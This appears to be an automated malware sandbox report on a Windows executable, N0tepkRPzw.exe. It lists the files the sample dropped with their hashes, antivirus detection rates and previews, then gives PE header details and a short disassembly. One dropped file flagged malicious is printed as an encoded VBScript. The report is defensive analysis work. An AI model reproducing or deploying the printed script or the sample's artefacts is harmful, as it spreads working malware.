            • Antivirus: ReversingLabs, Detection: 88%
            • Antivirus: Virustotal, Detection: 68%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:ASCII text, with very long lines (659), with no line terminators
            Category:dropped
            Size (bytes):659
            Entropy (8bit):5.876370512065259
            Encrypted:false
            SSDEEP:12:/v600XShRGvHx3r9vxZ+ylkT8EjpKHRL+k0OU8dxHiZFdNfYJOC3HCoZgTT:/v60TMnsylD+d4WnNfRCSSE
            MD5:0BB1ACAF1AD9F293A7EB3DB53DD3AD26
            SHA1:BC6F71E531316ADAF8DC2F4F4BCFE187879AFA35
            SHA-256:40DA884C3F6A4E7047A4775881122DA0D677F712EF18DAA98A3DBD1AD8C2E144
            SHA-512:5271740E41B2C9CD5CEE9BA3EB33F48AEDD6AFE23254C16B9E994CAA241837092A0EB03827C3D19900543F7D6436DDDAA1749F26FD2686A5E47C57FC45A3F494
            Malicious:false
            Preview:CzGHLuxEAoq4ya9CP9SFkkFqFrAkQU7wI3TVQdkD7JTfApQOE4AYtnEbuZCduMypr4v5GnvvZPIbQjpZbwgVUiDfz1l0bHTuUnxG4UHaJO9eemLLtnB7qdVJ1PGPC5US6YGmvjfHoFLGiiAMqZGxFVD0SoOoO2XN3qiGgiZKI4TkROkSO3jmyhMkUPTHU02ws8M1A4qHA6pLCcjDD6ZUTuZWd7wQOSzRCh2TCsRUNbm21Bi1qPDYbhc7i0XDIZ2sGXJekPBUpEH1IgebY4j9Ob0eE4uLUOMxj4ve2DRbOstWalzCW6oO03dphoaqez9b2TRNuAjVmIvfseDdEszYj87qbG7Onl6YtRdHTmRWWTlrH77Dl7lw9k14WlwoCUrBMWwaA6JcadBQXPieJ3nq9JYIajvsznTClkfuKgCoxJWgilhGCSeJrBBC8o9aLbnwK9oxtxTm1820x2jyCopgIJUjidwfgmdVgjVj7tXO82RsJLOGELXhvGoApFOPBxFOfhUOgA1SRbiQ2laXPpaVO6ja5U32fHNLxDNl09jETEPUiYIDo1AVWtAj74TMG9xJNWdyYygPGWBJqP1gL0NoG1yDDno6qX8URFGL5TozUuPAs03sCwAPvJCViZvuJkjsYr2kIql1MXTWmyUMu63
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1257984
            Entropy (8bit):6.954385369050077
            Encrypted:false
            SSDEEP:24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
            MD5:A6A0FB77338508B4185FE94263AA2D0F
            SHA1:0410A23443DE08D9CA311D2AEF1264232D4014A4
            SHA-256:5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
            SHA-512:D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            • Antivirus: Virustotal, Detection: 68%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):67
            Entropy (8bit):5.084381167908259
            Encrypted:false
            SSDEEP:3:OoNUBkv/ReDBL3n:V6SHReDBLn
            MD5:B3BFEFA7A61402EF5EA770A564ADCBDE
            SHA1:7A0BF6CA739828C9F451F32B9841363ED806B32F
            SHA-256:14728CC7F396D9C2739D0B69827489AFBB309D2C192D0A03ACDF2DDB27F044BD
            SHA-512:0BBD1BDE859639957E2CE1798535898AA4EF345B628D36923EA5E4E92C15FA8B3F82F4251BA2EEA8EB70683DCF5485A974DC2474CA53E42C1CFCC027020EB17C
            Malicious:false
            Preview:jKOYxovBhyVrhXs0EcQnhnt6QhQAnjRDm3nP4iXnrYO6fKkUXpnxytf5bRIPXuY7gRF
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1257984
            Entropy (8bit):6.954385369050077
            Encrypted:false
            SSDEEP:24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
            MD5:A6A0FB77338508B4185FE94263AA2D0F
            SHA1:0410A23443DE08D9CA311D2AEF1264232D4014A4
            SHA-256:5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
            SHA-512:D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            • Antivirus: Virustotal, Detection: 68%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:ASCII text, with very long lines (900), with no line terminators
            Category:dropped
            Size (bytes):900
            Entropy (8bit):5.902480922685692
            Encrypted:false
            SSDEEP:24:nQ1fJbzE3db8gBUDUqR8IjQxApAcCrO06WRw77wUkGOPTVQe4:nKbkxUDBuIjQBcsO07RLLVa
            MD5:E1E33CB397871C9E55F73DA1C0D4B83D
            SHA1:D6D15D7F96EE1A17613703703B6B7ABE71B81EBB
            SHA-256:39072C33937805BF4F759748506B87BBF56DC1CDA5CC69C43716A81137A1D7CC
            SHA-512:0342DE7CCCBFCBC2734760AE321BEBD831C2DBCD7C81C1F14EB831DAEC606F17A54D2678058ACA41E8F0533E8FA6183AF816F47FC1527DE422702B8EA8E6CD86
            Malicious:false
            Preview:puLglA8SjVKIDY0qtuEjANqpVqIuhXDGTSrjKFMUObWisOoKRWB2a83cDfL51OvMREyvqQgohuUi0I6GB8cKWKqVYPfo4QcApKQoZ3eBzXVpnUm4jE43wk0HXdWbv1uRSU2p2SrIeaV8zArEmkFzWjOFUJQ6gCQ8mEXTb6CQXvYVP1RWwSyKw44tGxVtBulbKXVvnYmqiyckK2zd14KOOGLsJoMolTPmK7K2fgtYpIl8bUiN821HkXNELnl9L8EOizaMs67VLviFeNQzF8psbIBxtFr14tMrDWZm4VfB4f6yyHk8Ww4NSWxaxmdnPFbbj1CHyo5tdny6MN9metfHz8Yrj8yR22wyEeO6EdJs1Kuoi1Okn0IgkTlldVhz0n0k191r8ChBjwQoNtJsuNnCtPNu2ndt6U2NTJxi9gmkTG7yC6XtMyFm9y1lvGyUjxFO4DVE6ktNkDsnSZs5QthHPPNfSLx2rSBfBs39lSxlF1C6FOTVY3DzQ79oz0wvx0fSBNljgsU765CXNRZE1bdyOLODtOKvgByOVt52mtzqiG3U5lbiar3VWrE08h0Riia4HyCdWhbImxPHS4IHxlUzHd1opE3E2iIAp8NGj7M3Pvtjb6iEYte6Nlwo6XyRoXPEpPcTrCizZbjWuSNtgzqJDMxDLjJLJ5P2go4LdOXWKpgvCa3oKEuyrFAccYHH2WpeMq0FXBPSbT8YqBBvpeBFLaLaobtFGPex9BjVkyRIzbXXGlwaXWcXVkTweZb6RJLMzLYocpK0N2PtDyTCoSsuwGcZsx1KXU1pQKi5NI8rLlJdUjtqGYR9bbZst95oyAd3Bkd2PXzgTAiL68FJEKE8D2Nzu0MNNT3LIQctG0bsjvpa2Ovu4wko6ezJWoHZLlS9HWCq
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1257984
            Entropy (8bit):6.954385369050077
            Encrypted:false
            SSDEEP:24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
            MD5:A6A0FB77338508B4185FE94263AA2D0F
            SHA1:0410A23443DE08D9CA311D2AEF1264232D4014A4
            SHA-256:5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
            SHA-512:D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            • Antivirus: Virustotal, Detection: 68%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):216
            Entropy (8bit):5.741305750336543
            Encrypted:false
            SSDEEP:6:DhDbofHBK83nyQDtM4i8eMJ6RI0jxr3ln:1bYBKwnySeSeMJ6RIq9l
            MD5:85B7E5600954DF5ADFA0F0E475B5B763
            SHA1:0AAA2FE15ECA4F3AF9215641D5072FD4A51C1218
            SHA-256:69C6090A2644E15AF6DA9691B4F4E4FC551F7E1C92FA9A8BA65ACBDC2D52253B
            SHA-512:8F145D26E04B7AFEFDCD8A523B194F11167B849BE15346EFD2F80ED63D2C0A93453407606AA04C9A26D3D6D8FBB11867F938D7D198F072F627E67E67FA315C4C
            Malicious:false
            Preview:x6fEcTbsPPoaSXcsCh7cpSgMFNitX5kEi6jrlUsR1R2GYPO8kfqxbzheaT9PurVTpj2WxuGrzqkYZZxz9kI2OwnsYFRSUdgK5ibyW1K0Y88vOJEAfKQKidF26K7scyXVJac078cHaSdPy1dPARwKNWlbdj2M3cYklnlyqNChrItQAzEEqsrKCNIwzBXYGPN742oLPpiwOPcEmVbnfxgKuNiX
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1257984
            Entropy (8bit):6.954385369050077
            Encrypted:false
            SSDEEP:24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
            MD5:A6A0FB77338508B4185FE94263AA2D0F
            SHA1:0410A23443DE08D9CA311D2AEF1264232D4014A4
            SHA-256:5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
            SHA-512:D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            • Antivirus: Virustotal, Detection: 68%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):1830
            Entropy (8bit):5.3661116947161815
            Encrypted:false
            SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKktJtpaqZ8
            MD5:FE86BB9E3E84E6086797C4D5A9C909F2
            SHA1:14605A3EA146BAB4EE536375A445B0214CD40A97
            SHA-256:214AB589DBBBE5EC116663F82378BBD6C50DE3F6DD30AB9CF937B9D08DEBE2C6
            SHA-512:07EB2B39DA16F130525D40A80508F8633A18491633D41E879C3A490391A6535FF538E4392DA03482D4F8935461CA032BA2B4FB022A74C508B69F395FC2A9C048
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\Program Files\7-Zip\Lang\qVUjshNEHYUOCXyHyUMQwFlZoe.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
            SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
            MD5:12C61586CD59AA6F2A21DF30501F71BD
            SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
            SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
            SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
            Malicious:false
            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:ASCII text, with very long lines (929), with no line terminators
            Category:dropped
            Size (bytes):929
            Entropy (8bit):5.90527354015349
            Encrypted:false
            SSDEEP:24:GDUxcW3VgjWq8buSSRtUFJNhSvIPvnUYqATkwc0yvXhr7UzZ5:8LW3tZSsFYQPvnGwYvxXUt5
            MD5:67A662A1A087CB97046BA1F2E4B4A27D
            SHA1:7B7461C30A034A53F638AD0B7FF91872D98214A2
            SHA-256:BBE9AC6E604A79997B9A9BE079BF05D622A6BBB8232186A884EDF46298F79DB9
            SHA-512:7A289429931E3045708A023622A2B5479FC3FD924058342CE35BD586DCF05A8CBB5EE33B5202FDDE0DFA51FBE6200611EF015CC2A20F2FFDF340848D0DA6913C
            Malicious:false
            Preview:Glm1IjUwWQCq0Uioy42vwMLZsFTiDn8Em9rir7K7wImpq3dEXQnpxYJ4aMICQvssR7D0m961u58njgszmOLxASRO0xIfyHrBa3XszmcYUw52afU3dTaBj4s8pzAy0bCnN6NpI99AwwdOXZyUdOBeqqbfLZD9lnh3tRodSoveUaOxbdlQBqUlZi6hesdt69YIOjfFuUCzdhKQboDsxw85S6dKUH8jKChUCGi18ffrnfI2YqG0ov5KBczSGUvnWcoa9zNVGLtSRRRwykwnBI5YGWTjQPvou2UL1r2icvtcCn3uKDefhHmOhPUngoE0aEhY6G5HrOKQYcWddiYNvPGnPGolWPByq3C7FexEHWyT6WzE30J8Q1EK74JzbTucNWjfZYY9vTFZbxq3RjsgGDhyy1AKU7mymWGjwUofcKM6vptKOQi2lNVJyurhYNoxrRwFrHG64MD50lDIIz6EYuMYA6uCmHHOgZPe3ocGJm7YKaTNriZiRjY6FXEvWEUxFyZbWiOeWz4wwxOkmhUDri76ASZfjruFSJTVA21IT4LbolJRJeIytQFg1daDJt5pFzeme2juqMtwXgSYIHWEi5WBEwehbx8k9gWzGgwQ5YIhgSJVLB4BX0GJdcirYCS2NJx1JcSlVFJJxyfvnJWa26NJZNWn8F22GPUWfSLstTqRr6Vo7wEOq19Q5nb6GonPNQDieIQV7nrjP6cc1rqLBnMOPDb10PmFpbDa3xJygsQCKaA9L9EY7bOjDySarYesBl3y2BiEi2oSWKEzDbq1LNIOMdXFetGINiAigLHKa90Ew6N2tdXQrnhxdpmYodjywgEyKfS1UgbLXDbQQeVBV0akBMF1jsf6ZBSQ1ZsOLg5LMVaaNWHKIid6Fex7aaSlAevWvKY1vG0y4PYpwpnNlVy1hVLWlvyuOUKrk
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1257984
            Entropy (8bit):6.954385369050077
            Encrypted:false
            SSDEEP:24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
            MD5:A6A0FB77338508B4185FE94263AA2D0F
            SHA1:0410A23443DE08D9CA311D2AEF1264232D4014A4
            SHA-256:5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
            SHA-512:D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            • Antivirus: Virustotal, Detection: 68%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:ASCII text, with very long lines (921), with no line terminators
            Category:dropped
            Size (bytes):921
            Entropy (8bit):5.893413562442376
            Encrypted:false
            SSDEEP:24:VRAa4yPtRBTQgVCVA0cNqPdB0AUSXcUmSdaVNbQcJQ4t4:0utX19O0NSXcZSkVNtt4
            MD5:10545AE0D579F04EE12FF018BD80CC61
            SHA1:6E274BB3B299431C900FCA3FA950AC8C7E795A9F
            SHA-256:08D266057ED4408AA081DDCA1B7445B2F2F9DA437CA141A406344D7AB3DF7C72
            SHA-512:D9D287B1D67000F287B052C2C792C35C431653A708AB0F5779DA04CEF33F5E90993D9CE5CF694C653D276B6E10CA0ADB28389BB7667B7F823AD1C6BD33F0B463
            Malicious:false
            Preview:6wuDKejt3StCNrTQqaq26kyAJ09Tbl8fAzQvnaoeFGuIs1ioy5MYTR8V8u4TfQRRTNCYahnQvMxzzpSRSUegZkMs05w2gV9yydzfzKOQS6mHeJfTcmBKwv2sBThfvutaM8AW0wcHGNOd8EOrZda4UyCDkGdgnsfiML4gIJdpJ3EihZu6FzGRTzGX57vtS6eXspQwJrjQAvuaudfLWhaxmOPXFhkKXtWNZq01I7xXQ0RhEqncbkXvfruea3qmHY2QZhAEnoDYuDgw7rSZ4IsxWkss5WaPQKP27AHhpjyxg8BbK8htlRs9pF4zySIRNyHjxnz6kuuVT5QYiQh7yrn9cQN1GStWagks0cnhJkI0hWpuzgQhvKcfKIGha80SBX4wUhhGnAyOjxbFlcBkBLkQEFisVGGLu0zJc2ZS8J4vWO5XqA576PQzxnsO8yvg3nes7RntDtl1Qz4zJLBULIOek9WyJKTJYY1suNZYXM4NoYj7t2FxxaVvY9I75yj2Zbd27LF6vm78NBzLaZEQFfW8CFTuFbdimCxM5r9ixIBKcWhXJ6hgtSw3Fez11U0UIYVLNnQtZgd7eLfpi5kJ37zTP3Ha1HqcRrCEAWKgpyGNzzZ39JT5uraLjC5Ufz1RzBpxJboLvEdF0leaeNbryusjQ1f8azA06zXyKmuheHKpOVU7hf0SXKdFTFgS5qu5DmIAOqQ1c3MqkCV5gib59scwWSeFFclyXOlmMTs0O8ze7xeQukvXOz5VKWo6LLv9RYTWattMzkrB28yjxOUfrOjhSQbzowpDMzMjdIzA1iioH4cMhFI70QSDyvDKR3hD5nyCvOFpYUnIq5ZXxPSjnsN6hIvsEpt7AeteFaaS9digmKX3VpWCl8aMa2fndWkskpHLL5SXy9jJJqTWv2XYTrWCEgDN4
            Process:C:\bridgeportserver\blockServerruntime.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1257984
            Entropy (8bit):6.954385369050077
            Encrypted:false
            SSDEEP:24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
            MD5:A6A0FB77338508B4185FE94263AA2D0F
            SHA1:0410A23443DE08D9CA311D2AEF1264232D4014A4
            SHA-256:5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
            SHA-512:D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            • Antivirus: Virustotal, Detection: 68%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\N0tepkRPzw.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):44
            Entropy (8bit):4.1491706083099515
            Encrypted:false
            SSDEEP:3:I53ADVMRHcXZEGOhROLAEn:IiDVQI+ROJn
            MD5:D3FD56DED9966D3B3A1BBF6AD396C114
            SHA1:2B3D4E14F8902ACFEE37E419A56725907854E4FF
            SHA-256:6DDB2EA308D6FE828E8E466B1B89A15D0B4E628C09FDE818375932E869567816
            SHA-512:18A4B024C2D66B9F868DBB7A02EF115CB202032CE1B7140481324FE1794FBA54A06A58419A74583F25F24C71A1C0298D73767969E5E369119F0CDBF3534A79BC
            Malicious:false
            Preview:"C:\bridgeportserver\blockServerruntime.exe"
            Process:C:\Users\user\Desktop\N0tepkRPzw.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):1257984
            Entropy (8bit):6.954385369050077
            Encrypted:false
            SSDEEP:24576:IjPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOv:IjGh8IT0G2jbtTO
            MD5:A6A0FB77338508B4185FE94263AA2D0F
            SHA1:0410A23443DE08D9CA311D2AEF1264232D4014A4
            SHA-256:5259BAC06DF9A11630CEDA76CC26AD9D1FB676E0F633A2B569CB4BB0760A10C7
            SHA-512:D2CAFF587DF44C8C4A676FF296B96EC82E3F904956F398E589121E0BE1D9F44E2C26E73F8220BF30DF8CB2C7BE45A7EEA5EADA8602F90FC473079E2D7FD5D995
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            • Antivirus: Virustotal, Detection: 68%, Browse
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6......~.... ... ....@.. ....................................@.................................0...K....`............................................................................... ............... ..H............text........ ...................... ..`.sdata.../... ...0..................@....rsrc........`.......,..............@..@.reloc...............0..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\Desktop\N0tepkRPzw.exe
            File Type:data
            Category:dropped
            Size (bytes):220
            Entropy (8bit):5.797882130410325
            Encrypted:false
            SSDEEP:6:Gh0wqK+NkLzWbHK/818nZNDd3RL1wQJRcUdjLIzFxOPPCt1Y:GhFMCzWLKG4d3XBJ26LIzSyjY
            MD5:3E1CAF4771BE829DA924FF455DA48E03
            SHA1:12E8D477E1A09A72142CFF6888D7397097B60F43
            SHA-256:CF5AAE2AC65F7E59A64C06D82E700C33D8A2B01564F7620F2328DAF8D14E2822
            SHA-512:1639E4B66DAD75288E21291705EEFED5BEE54FC477BFF681782902CC92D3C845B2D3E0AD5EBD4A603004FC47C0002D6B400AAEB0C980248AC2C441DF2CC8DAA2
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:#@~^wwAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ4.bNT+wKDDd+M\nDJ%UsTDcyKbIn|TA}M;b`f0rUzzh3R(CYr~~TBP0Csk+Oj4AAA==^#~@.
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.497784504595164
            TrID:
            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
            • Win32 Executable (generic) a (10002005/4) 49.97%
            • Generic Win/DOS Executable (2004/3) 0.01%
            • DOS Executable Generic (2002/1) 0.01%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:N0tepkRPzw.exe
            File size:1'806'983 bytes
            MD5:4b173aaa031de977353ca903f23520e4
            SHA1:56261520faf4c58a72be2edcff1c65a011896e16
            SHA256:da46d37c422bf241bd3dabbc8846d9f94e3d2b7f3e80e17d70bcc6eb13161630
            SHA512:ec324bc9425a2d1b20449d476c6b188a83025009fd7accce544ca86769578c41b2b020cb16d7434a0707a9a1326d0106f701de4d265aaeb6988a8b17a8dcdc37
            SSDEEP:24576:h2G/nvxW3WT00jPwL1th2H/Hg43G/Zkx93WBbpA+EZhYETOvk:hbA3Z0jGh8IT0G2jbtTO8
            TLSH:C0858D017E40C951F0592673C2AF520847B49D112BA6E31BBEA93B7EB5363933D1E9CB
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..
            Icon Hash:363627270d99191c
            Entrypoint:0x41ec40
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1
            Instruction
            call 00007FED3D177C99h
            jmp 00007FED3D1776ADh
            cmp ecx, dword ptr [0043E668h]
            jne 00007FED3D177825h
            ret
            jmp 00007FED3D177E1Eh
            int3
            int3
            int3
            int3
            int3
            push ebp
            mov ebp, esp
            push esi
            push dword ptr [ebp+08h]
            mov esi, ecx
            call 00007FED3D16A5B7h
            mov dword ptr [esi], 00435580h
            mov eax, esi
            pop esi
            pop ebp
            retn 0004h
            and dword ptr [ecx+04h], 00000000h
            mov eax, ecx
            and dword ptr [ecx+08h], 00000000h
            mov dword ptr [ecx+04h], 00435588h
            mov dword ptr [ecx], 00435580h
            ret
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            int3
            lea eax, dword ptr [ecx+04h]
            mov dword ptr [ecx], 00435568h
            push eax
            call 00007FED3D17A9BDh
            pop ecx
            ret
            push ebp
            mov ebp, esp
            sub esp, 0Ch
